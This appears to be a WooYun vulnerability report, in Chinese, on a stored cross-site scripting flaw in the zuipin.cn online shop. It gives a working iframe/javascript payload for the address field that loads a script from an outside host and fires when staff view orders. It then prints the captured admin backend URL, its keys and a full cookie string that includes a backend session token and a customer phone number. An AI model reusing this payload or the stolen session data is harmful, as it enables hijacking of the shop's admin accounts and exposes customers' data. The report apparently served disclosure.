WooYun.org

http://www.zuipin.cn/customer/address/?utm_source=zuipin&utm_medium=page&utm_campaign=index 在收货地址信息地址栏处插入XSS，<iframe src=javascript:with(document)0[body.appendChild(document.createElement('script')).src="http://1.js"]></iframe>

然后随便选个商品下单，商家在后台查看订单时即可触发XSS。

location : http://www.zuipin.cn/index.php/admin/report_sales/waitingPayOrder/key/c789ccc295c992625948670c175e87d0/filter/cmVwb3J0X2Zyb209MjAxNS0wMS0zMCZyZXBvcnRfdG89MjAxNS0wMS0zMSZyZXBvcnRfcGVyaW9kPW1vbnRo/form_key/dyuwlRDSpJTMj7St/
toplocation : http://www.zuipin.cn/index.php/admin/report_sales/waitingPayOrder/key/c789ccc295c992625948670c175e87d0/filter/cmVwb3J0X2Zyb209MjAxNS0wMS0zMCZyZXBvcnRfdG89MjAxNS0wMS0zMSZyZXBvcnRfcGVyaW9kPW1vbnRo/form_key/dyuwlRDSpJTMj7St/
cookie : _UUID=f1euQA8AEfCNuwLZ%3B2014/10/7%2015%3A52%3A21; _first_referer=a%3A3%3A%7Bs%3A7%3A%22keyword%22%3Bs%3A216%3A%22http%3A%2F%2Fopen.union.360.cn%2Fgo%3Fbid%3D20122073%26cid%3D1003%26qihoo_id%3D36110%26url%3Dhttp%253A%252F%252Fwww.zuipin.cn%252F20141022pu.html%26sign%3D3efd1970c7%26aname%3Drecommend%26asign%3D88fcda4608%26fname%3Dmall_index%26fsign%3Df3b1520665%26sa%3Dcuxiao_967_39588%22%3Bs%3A4%3A%22from%22%3Bs%3A17%3A%22open.union.360.cn%22%3Bs%3A4%3A%22date%22%3Bs%3A19%3A%222014-10-27 17%3A37%3A51%22%3B%7D; _jzqy=1.1416209928.1416209935.2.jzqsr=baidu|jzqct=%E7%9D%A1%E8%A1%A3%E5%BA%86%E5%90%8C%E4%B8%93%E8%90%A5%E5%BA%97.jzqsr=baidu|jzqct=%E9%86%89%E5%93%81%E5%95%86%E5%9F%8E; _jzqz=1.1417515077.1417515077.1.jzqsr=0_0_0|jzqct=22609_128762_1220041_11230844_11230844006.-; _jzqosr=HCoNVv9WjDL0; _customer_info=0371-62568633%7C%7C776448; umt_cms_source=a%3A6%3A%7Bi%3A971%3Bs%3A28%3A%2220150122_nh3-hong%7C1422341920%22%3Bi%3A1577%3Bs%3A26%3A%2220150123_nh3-wu%7C1422509331%22%3Bi%3A2135%3Bs%3A28%3A%2220150122_nh3-hong%7C1422430085%22%3Bi%3A1882%3Bs%3A28%3A%2220150122_nh3-hong%7C1422430239%22%3Bi%3A1569%3Bs%3A26%3A%2220150123_nh3-wu%7C1422509285%22%3Bi%3A1289%3Bs%3A28%3A%2220150122_nh3-hong%7C1422510165%22%3B%7D; _jzqx=1.1412682457.1422607813.312.jzqsr=zuipin%2Ecn|jzqct=/zrxz0936-l240%2Ehtml.jzqsr=zuipin%2Ecn|jzqct=/catalogsearch/result/; backend=0e9b81940d6f37dbfe27dbe750165cbd; lmdp=plmokn; referer=bnVsbA==; expires=Sun, 11-Jan-70 00:00:00 GMT; _pk_ref.1.2d7c=%5B%22%22%2C%22%22%2C1422665122%2C%22http%3A%2F%2Fxd.mediav.com%2Fs%3Ftype%3D8%26r%3D5%26impid%3DRPPyemhCNA4%3D%26cid%3D11230844%26size%3D960x90%26pid%3DYrCdQQFuz8et%2BxT%2BfAh8FcIzP5dijDHtSgY%2FwlpQhaTUforfGXg05HbJ1fuFpfkr%26vtype%3DAQEBAQEG%26mv_ref%3Dhttp%253A%252F%252Fwenku.baidu.com%252Flink%253Furl%253D0_Erd9wPHu9QfeViV97cgI7hAzUN1mvTdh5lmnQ8FcmI7pOxjLItu2eawG5V5SXW0jl2HKGYTDlO9DaPpMUj5WXRSN7ju6CqmuYL_aWgAze%26tpclick%3Dhttp%253A%252F%252Fclick%252Ebes%252Ebaidu%252Ecom%252Fadx%252Ephp%253Fc%253Dcz0zMjhhZTRkMWMzYTQ2YjlmAHQ9MTQxNzUxMDE3NgBzZT0xAGJ1PTY0NTU3NjYAdHU9OTIwMzE0AGFkPTExMjMwODQ0AHNpdGU9aHR0cDovL3dlbmt1LmJhaWR1LmNvbS9saW5rP3VybD0wX0VyZDl3UEh1OVFmZVZpVjk3Y2dJN2hBelVOMW12VGRoNWxtblE4RmNtSTdwT3hqTEl0dTJlYXdHNVY1U1hXMGpsMkhLR1lURGxPOURhUHBNVWo1V1hSU043anU2Q3FtdVlMX2FXZ0F6ZQB2PTEAaT02ODFmY2E5ZQ%2526k%253Ddz05NjAAaD05MABjc2lkPTM4NjU0NzA1NzYwMAB0bT0xNDYzNjE5AHRkPTQ3MDQwMDQAZm49OTEwMTAwOTlfMTdfY3ByAGZhbj0AdWlkPTY4MjM2NDkAY2g9MABvcz0xMABicj0xMgBpcD01OS41Ny4yNDAuMjQyAHNzcD0xAGFwcF9pZD0AdHRwPTEAY29tcGxlPTAAc3R5cGU9MA%2526url%253D%22%5D; _zuipinnh3_popup=foo3; _jzqckmp=1; Hm_lvt_86e6c1e0732fb1edc3f2f3ce1020ad76=1422428412,1422508442,1422599428,1422665121; Hm_lpvt_86e6c1e0732fb1edc3f2f3ce1020ad76=1422667857; CNZZDATA2689068=cnzz_eid%3D1309283510-1412667905-%26ntime%3D1422667017; _pk_id.1.2d7c=497725cb6fb0347d.1412668342.556.1422667858.1422608354.1422667858; _pk_ses.1.2d7c=*; _ga=GA1.2.559586363.1412668342; _qzja=1.733716292.1412668341822.1422607812516.1422665122304.1422666255042.1422667857822..1.36.7717.558; _qzjb=1.1422665122304.5.0.0.0; _qzjc=1; _qzjto=5.1.0; _jzqa=1.525554542661187000.1412668342.1422607813.1422665122.557; _jzqc=1; _jzqb=1.6.10.1422665122.1